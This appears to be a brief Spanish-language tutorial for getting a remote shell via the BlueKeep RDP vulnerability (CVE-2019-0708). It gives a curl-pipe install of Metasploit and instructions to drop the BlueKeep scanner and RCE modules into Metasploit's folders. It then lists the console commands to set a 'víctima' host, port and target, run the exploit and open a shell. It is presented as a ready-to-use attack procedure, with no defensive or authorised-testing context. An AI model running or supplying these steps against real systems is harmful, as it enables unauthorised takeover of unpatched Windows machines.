
CVE-2019-0708 RCE ejecución remota de código tutorial de getshell
Actualización e instalación de Kali curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msfinstall && \ ./msfinstall
Descargar el kit de ataque y colocar los archivos en las carpetas correspondientes de msf (si ya existe un archivo con el mismo nombre, simplemente sobrescribir).
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
Proceso de explotación:
msfconsole
reload_all
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Usar set RHOSTS [IP de la víctima] para establecer la IP de la máquina víctima
Usar set RPORT [PUERTO de la víctima] para establecer el puerto RDP de la máquina víctima
Usar set target [ID numérico (opcional 0-4)] para establecer la arquitectura de la máquina víctima
set target=3
exploit
shell
